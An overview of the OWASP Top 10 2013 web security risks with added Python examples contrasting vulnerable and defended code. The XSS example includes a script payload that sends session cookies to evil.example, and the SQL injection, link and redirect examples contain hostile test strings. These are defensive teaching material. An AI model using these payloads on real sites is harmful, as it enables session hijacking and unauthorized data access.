OWASP (the Open Web Application Security Project) is an open-community, non-profit organization with about 130 chapters and nearly ten thousand members worldwide. Its main goal is to research and promote standards, tools and techniques for web software security, and it has long worked to help governments and enterprises understand and improve the security of their web applications and services.

1. Release Notes


The threat landscape for application security constantly changes. Key factors in this evolution are advances made by attackers, the release of new technologies with new weaknesses as well as more built-in defenses, and the deployment of increasingly complex systems. To keep pace, we periodically update the OWASP Top 10. In this 2013 release, we made the following changes:


1) Broken Authentication and Session Management moved up in prevalence based on our data set. We believe this is probably because this area is being looked at harder, not because these issues are actually more prevalent. This caused Risks A2 and A3 to switch places.


2) Cross-Site Request Forgery (CSRF) moved down in prevalence based on our data set from 2010-A5 to 2013-A8. We believe this is because CSRF has been in the OWASP Top 10 for 6 years, and organizations and framework developers have focused on it enough to significantly reduce the number of CSRF vulnerabilities in real world applications.


3) We broadened Failure to Restrict URL Access from the 2010 OWASP Top 10 to be more inclusive:

- 2010-A8: Failure to Restrict URL Access is now 2013-A7: Missing Function Level Access Control, to cover all of function level access control. There are many ways to specify which function is being accessed, not just the URL.


4) We merged and broadened 2010-A7 & 2010-A9 to CREATE: 2013-A6: Sensitive Data Exposure:

- This new category was created by merging 2010-A7 – Insecure Cryptographic Storage and 2010-A9 – Insufficient Transport Layer Protection, plus adding browser-side sensitive data risks as well. This new category covers sensitive data protection (other than access control, which is covered by 2013-A4 and 2013-A7) from the moment sensitive data is provided by the user, sent to and stored within the application, and then sent back to the browser again.


5) We added: 2013-A9: Using Known Vulnerable Components:

- This issue was mentioned as part of 2010-A6 – Security Misconfiguration, but now has a category of its own, as the growth and depth of component-based development has significantly increased the risk of using known vulnerable components.





2. Application Security Risks

Attackers can potentially use many different paths through your application to do harm to your business or organization. Each of these paths represents a risk that may, or may not, be serious enough to warrant attention.


Sometimes, these paths are trivial to find and exploit and sometimes they are extremely difficult. Similarly, the harm that is caused may be of no consequence, or it may put you out of business. To determine the risk to your organization, you can evaluate the likelihood associated with each threat agent, attack vector, and security weakness and combine it with an estimate of the technical and business impact to your organization. Together, these factors determine the overall risk.


3. Top 10 Security Risks

A1 – Injection

Injection flaws, such as SQL, OS, and LDAP injection occur when untrusted data is sent to an interpreter as part of a command or query. The attacker’s hostile data can trick the interpreter into executing unintended commands or accessing data without proper authorization.

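An added illustration that is not part of the OWASP text: the same user lookup written by string concatenation and as a parameterized query, run against a constructed in-memory SQLite table. The table contents, the user names and the hostile input are made up for this example.

```python
import sqlite3


def make_db():
    """Constructed sample data: three users in an in-memory SQLite database."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT, role TEXT)")
    conn.executemany(
        "INSERT INTO users (name, role) VALUES (?, ?)",
        [("alice", "user"), ("bob", "user"), ("root", "admin")],
    )
    return conn


def find_user_vulnerable(conn, name):
    """Builds the SQL text from untrusted input. A quote character in `name`
    closes the string literal and the rest of the input is parsed as SQL, so
    the attacker controls the query's structure, not just a value."""
    sql = "SELECT name, role FROM users WHERE name = '" + name + "'"
    return conn.execute(sql).fetchall()


def find_user_safe(conn, name):
    """Parameterized query: the driver binds `name` as a value, so the
    interpreter never sees it as part of the command."""
    return conn.execute("SELECT name, role FROM users WHERE name = ?", (name,)).fetchall()


def demo():
    """Run both versions with an honest name and with a tautology payload."""
    conn = make_db()
    honest = "alice"
    hostile = "x' OR '1'='1"  # turns the WHERE clause into ... = 'x' OR '1'='1'
    return {
        "vuln_honest": find_user_vulnerable(conn, honest),
        "vuln_hostile": find_user_vulnerable(conn, hostile),
        "safe_honest": find_user_safe(conn, honest),
        "safe_hostile": find_user_safe(conn, hostile),
    }


if __name__ == "__main__":
    for label, rows in demo().items():
        print(label, rows)
```

The vulnerable version returns every row for the hostile input (the tautology makes the WHERE clause always true), while the parameterized version returns nothing because no user is literally named `x' OR '1'='1`. The same principle applies to OS command and LDAP injection: keep untrusted data out of the command text and pass it through an API that treats it as data.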

A2 – Broken Authentication and Session Management

Application functions related to authentication and session management are often not implemented correctly, allowing attackers to compromise passwords, keys, or session tokens, or to exploit other implementation flaws to assume other users’ identities.

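An added example, not from the OWASP document, of the session-management properties the paragraph is about: unguessable session identifiers, a fresh identifier issued at login (so a pre-login identifier planted by an attacker, i.e. session fixation, never becomes an authenticated session), idle-timeout expiry, and server-side invalidation on logout. The `SessionStore` class, its in-memory dictionary and the timeout value are assumptions made for this illustration.

```python
import secrets
import time

SESSION_ID_BYTES = 32          # 256 bits of entropy: identifiers must be unguessable
IDLE_TIMEOUT_SECONDS = 15 * 60  # assumed policy value for this example


class SessionStore:
    """Minimal server-side session store (assumed helper; a real deployment
    would back this with a database or cache so it survives restarts)."""

    def __init__(self, now=time.time):
        self._now = now             # injectable clock so expiry can be tested
        self._sessions = {}         # session_id -> {"user": ..., "last_seen": ...}

    def create(self, user):
        sid = secrets.token_urlsafe(SESSION_ID_BYTES)   # CSPRNG, not random.random()
        self._sessions[sid] = {"user": user, "last_seen": self._now()}
        return sid

    def login(self, old_sid, user):
        """Rotate the identifier on authentication: the pre-login id is dropped
        so a fixated id never gains the user's privileges."""
        self._sessions.pop(old_sid, None)
        return self.create(user)

    def lookup(self, sid):
        """Return the user for a live session, or None if unknown or expired."""
        entry = self._sessions.get(sid)
        if entry is None:
            return None
        if self._now() - entry["last_seen"] > IDLE_TIMEOUT_SECONDS:
            del self._sessions[sid]  # expired: remove so the id cannot be reused
            return None
        entry["last_seen"] = self._now()
        return entry["user"]

    def logout(self, sid):
        """Invalidate on the server, not just by deleting the browser cookie."""
        self._sessions.pop(sid, None)


if __name__ == "__main__":
    store = SessionStore()
    anon = store.create("anonymous")
    sid = store.login(anon, "alice")
    print("pre-login id still valid?", store.lookup(anon) is not None)
    print("authenticated user:", store.lookup(sid))
```

Transport matters as much as generation: the identifier should travel only in a cookie marked `Secure` and `HttpOnly`, never in a URL, otherwise the rotation and expiry above protect a value that leaks through logs and referrers anyway.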

A3 – Cross-Site Scripting (XSS)

XSS flaws occur whenever an application takes untrusted data and sends it to a web browser without proper validation or escaping. XSS allows attackers to execute scripts in the victim’s browser which can hijack user sessions, deface web sites, or redirect the user to malicious sites.

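An added example (not from the OWASP document) of the escaping the paragraph calls for: a page fragment that pastes untrusted input straight into HTML next to one that escapes it for the text context, plus a link builder that shows why an attribute context needs escaping and a scheme check. The script payload and the URLs are constructed for the illustration.

```python
import html


def render_greeting_vulnerable(name):
    """Untrusted input concatenated into markup: any tags in `name` are
    interpreted by the victim's browser."""
    return "<p>Hello, " + name + "</p>"


def render_greeting_safe(name):
    """HTML text context: &, <, >, " and ' are turned into entities, so the
    browser renders the payload as literal text."""
    return "<p>Hello, " + html.escape(name, quote=True) + "</p>"


def render_link_safe(url):
    """Attribute context. Escaping stops the value from breaking out of the
    quoted href, but a javascript: URL is still valid inside it, so the scheme
    must be restricted as well."""
    if not url.lower().startswith(("http://", "https://")):
        url = "#"
    return '<a href="' + html.escape(url, quote=True) + '">profile</a>'


# Constructed payload: exfiltrates the session cookie to an attacker-controlled host.
PAYLOAD = "<script>document.location='https://evil.example/?c='+document.cookie</script>"

if __name__ == "__main__":
    print(render_greeting_vulnerable(PAYLOAD))
    print(render_greeting_safe(PAYLOAD))
    print(render_link_safe("javascript:alert(document.cookie)"))
```

Note that the right encoding depends on where the data lands (HTML text, attribute, JavaScript string, URL); one escaping routine applied everywhere is not enough, which is why the link builder above does more than `html.escape`.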

A4 – Insecure Direct Object References

A direct object reference occurs when a developer exposes a reference to an internal implementation object, such as a file, directory, or database key. Without an access control check or other protection, attackers can manipulate these references to access unauthorized data.


A5 – Security Misconfiguration

Good security requires having a secure configuration defined and deployed for the application, frameworks, application server, web server, database server, and platform. Secure settings should be defined, implemented, and maintained, as defaults are often insecure. Additionally, software should be kept up to date.


A6 – Sensitive Data Exposure

Many web applications do not properly protect sensitive data, such as credit cards, tax IDs, and authentication credentials. Attackers may steal or modify such weakly protected data to conduct credit card fraud, identity theft, or other crimes. Sensitive data deserves extra protection such as encryption at rest or in transit, as well as special precautions when exchanged with the browser.


A7 – Missing Function Level Access Control

Most web applications verify function level access rights before making that functionality visible in the UI. However, applications need to perform the same access control checks on the server when each function is accessed. If requests are not verified, attackers will be able to forge requests in order to access functionality without proper authorization.

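One added example, not from the OWASP document, serving both A4 and A7: an object-level check that honors a direct reference (a document id) only when the caller owns it, and a function-level check that a privileged handler enforces on the server for every call, whether or not the UI showed the link. The users, documents, roles and handler names are constructed for this illustration.

```python
from functools import wraps


class Forbidden(Exception):
    """Raised when a caller is not allowed to perform the requested action."""


# Constructed sample data (not from the page): two ordinary users and one admin,
# plus two documents identified by guessable integer keys.
USERS = {"alice": {"role": "user"}, "bob": {"role": "user"}, "carol": {"role": "admin"}}
DOCUMENTS = {
    101: {"owner": "alice", "body": "alice's tax return"},
    102: {"owner": "bob", "body": "bob's tax return"},
}


def role_of(user):
    return USERS.get(user, {}).get("role")


def require_role(role):
    """Function-level access control (A7): the check runs inside the handler,
    so hiding the button in the UI is not the only thing standing in the way."""
    def decorator(fn):
        @wraps(fn)
        def wrapper(current_user, *args, **kwargs):
            if role_of(current_user) != role:
                raise Forbidden(f"{current_user} may not call {fn.__name__}")
            return fn(current_user, *args, **kwargs)
        return wrapper
    return decorator


def get_document_insecure(current_user, doc_id):
    """Insecure direct object reference (A4): any logged-in user who changes the
    id in the request reads another user's record."""
    return DOCUMENTS[doc_id]["body"]


def get_document(current_user, doc_id):
    """Object-level check (A4): the reference is honored only for the owner or an
    admin. Missing and foreign ids get the same answer, so the response does not
    confirm which ids exist."""
    doc = DOCUMENTS.get(doc_id)
    if doc is None or (doc["owner"] != current_user and role_of(current_user) != "admin"):
        raise Forbidden("no such document")
    return doc["body"]


@require_role("admin")
def delete_user(current_user, target):
    USERS.pop(target, None)
    return f"{target} deleted by {current_user}"


def attempt(fn, *args):
    """Run a handler and report the outcome as a tuple (used by the demo)."""
    try:
        return ("ok", fn(*args))
    except Forbidden:
        return ("forbidden", None)


if __name__ == "__main__":
    print("insecure:", get_document_insecure("bob", 101))
    print("bob reads 101:", attempt(get_document, "bob", 101))
    print("alice deletes bob:", attempt(delete_user, "alice", "bob"))
    print("carol deletes bob:", attempt(delete_user, "carol", "bob"))
```

An alternative to checking ownership on every lookup is to avoid exposing the raw key at all, for example by giving each user an indirect per-session map from opaque values to real ids; the server-side check is still needed for anything the map does not cover.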

A8 – Cross-Site Request Forgery (CSRF)

A CSRF attack forces a logged-on victim’s browser to send a forged HTTP request, including the victim’s session cookie and any other automatically included authentication information, to a vulnerable web application. This allows the attacker to force the victim’s browser to generate requests the vulnerable application thinks are legitimate requests from the victim.

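An added example (not from the OWASP document) of the standard defense: a secret token bound to the session that a forged cross-site request cannot carry, checked on the state-changing handler in addition to the cookie. The request dictionaries, the `handle_transfer` handler and the per-deployment secret are constructed for this illustration.

```python
import hashlib
import hmac
import secrets

# Assumed per-deployment secret; in practice it comes from configuration, not source.
SERVER_SECRET = secrets.token_bytes(32)


def issue_csrf_token(session_id):
    """Token = nonce . HMAC(secret, session_id : nonce). It is embedded in the
    real page (hidden form field). A hostile site can make the victim's browser
    send the cookie, but cannot read the victim's page, so it never sees this."""
    nonce = secrets.token_hex(16)
    mac = hmac.new(SERVER_SECRET, f"{session_id}:{nonce}".encode(), hashlib.sha256).hexdigest()
    return nonce + "." + mac


def csrf_token_valid(session_id, token):
    """Recompute the MAC for this session and compare in constant time. A token
    issued for a different session fails because the session id is in the MAC."""
    try:
        nonce, mac = token.split(".", 1)
    except (ValueError, AttributeError):
        return False
    expected = hmac.new(SERVER_SECRET, f"{session_id}:{nonce}".encode(), hashlib.sha256).hexdigest()
    return hmac.compare_digest(mac, expected)


def handle_transfer(request, sessions):
    """Constructed stand-in for a POST handler. `request` mimics what the server
    sees: the cookie the browser attached automatically, and the form fields."""
    user = sessions.get(request.get("cookie_session"))
    if user is None:
        return (401, "not logged in")
    # The cookie proves the browser is logged in, not that the user meant to
    # send this request: require the token that only the legitimate page has.
    form = request.get("form", {})
    if not csrf_token_valid(request["cookie_session"], form.get("csrf_token")):
        return (403, "missing or bad CSRF token")
    return (200, f"{user} transferred {form['amount']} to {form['to']}")


if __name__ == "__main__":
    sessions = {"sid-1": "alice"}
    token = issue_csrf_token("sid-1")
    genuine = {"cookie_session": "sid-1", "form": {"csrf_token": token, "amount": "100", "to": "bob"}}
    forged = {"cookie_session": "sid-1", "form": {"amount": "100", "to": "mallory"}}
    print(handle_transfer(genuine, sessions))
    print(handle_transfer(forged, sessions))
```

The handler must also reject GET for state changes; otherwise an `<img src=...>` on the attacker's page is enough to trigger the transfer without any form at all.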

A9 – Using Components with Known Vulnerabilities

Components, such as libraries, frameworks, and other software modules, almost always run with full privileges. If a vulnerable component is exploited, such an attack can facilitate serious data loss or server takeover. Applications using components with known vulnerabilities may undermine application defenses and enable a range of possible attacks and impacts.


A10 – Unvalidated Redirects and Forwards

Web applications frequently redirect and forward users to other pages and websites, and use untrusted data to determine the destination pages. Without proper validation, attackers can redirect victims to phishing or malware sites, or use forwards to access unauthorized pages.

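An added example, not from the OWASP document, of validating a redirect target and of replacing a forward parameter with a server-side allowlist. The application origin, the allowed forward pages and the test inputs are assumptions made for this illustration; the redirect check goes a little beyond the paragraph by also rejecting the scheme-relative and backslash forms that browsers would resolve off-site.

```python
from urllib.parse import urljoin, urlparse

SITE_ORIGIN = "https://app.example"                       # assumed application origin
ALLOWED_FORWARD_PAGES = {"/home", "/account", "/orders"}  # assumed server-side allowlist


def safe_redirect_target(next_param, default="/home"):
    """Accept only a same-origin path (with optional query); anything else
    falls back to `default` instead of being sent to the browser."""
    if not next_param:
        return default
    # Backslashes and line breaks are treated specially by browsers and proxies
    # ("/\evil.example" behaves like "//evil.example" in some of them), so reject them outright.
    if any(ch in next_param for ch in "\\\r\n"):
        return default
    # Resolve against our own origin so that absolute URLs, scheme-relative
    # URLs ("//evil.example/...") and odd schemes show up as a foreign origin.
    resolved = urlparse(urljoin(SITE_ORIGIN, next_param))
    origin = urlparse(SITE_ORIGIN)
    if (resolved.scheme, resolved.netloc) != (origin.scheme, origin.netloc):
        return default
    if not resolved.path.startswith("/") or resolved.path.startswith("//"):
        return default
    return resolved.path + ("?" + resolved.query if resolved.query else "")


def safe_forward_page(page_param, default="/home"):
    """Server-side forwards bypass the browser, so a parameter that selects the
    page must map to a fixed set rather than being used as a path."""
    return page_param if page_param in ALLOWED_FORWARD_PAGES else default


if __name__ == "__main__":
    for value in ["/account?tab=2", "https://evil.example/phish", "//evil.example/phish",
                  "javascript:alert(1)", "/\\evil.example"]:
        print(repr(value), "->", safe_redirect_target(value))
    print(safe_forward_page("/admin"), safe_forward_page("/orders"))
```

When a login page needs to send users back to an arbitrary external site, keep a server-side allowlist of destinations or show an interstitial page that names the destination; do not let the request parameter decide on its own.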


4. Other risks considered (not in the 2013 Top 10)

Concurrency Flaws

Denial of Service (Was 2004 Top 10 – Entry 2004-A9)

Expression Language Injection (CWE-917)

Information Leakage and Improper Error Handling (Was part of 2007 Top 10 – Entry 2007-A6)

Insufficient Anti-automation (CWE-799)

Insufficient Logging and Accountability (Related to 2007 Top 10 – Entry 2007-A6)

Lack of Intrusion Detection and Response

Malicious File Execution (Was 2007 Top 10 – Entry 2007-A3)

Mass Assignment (CWE-915)

User Privacy



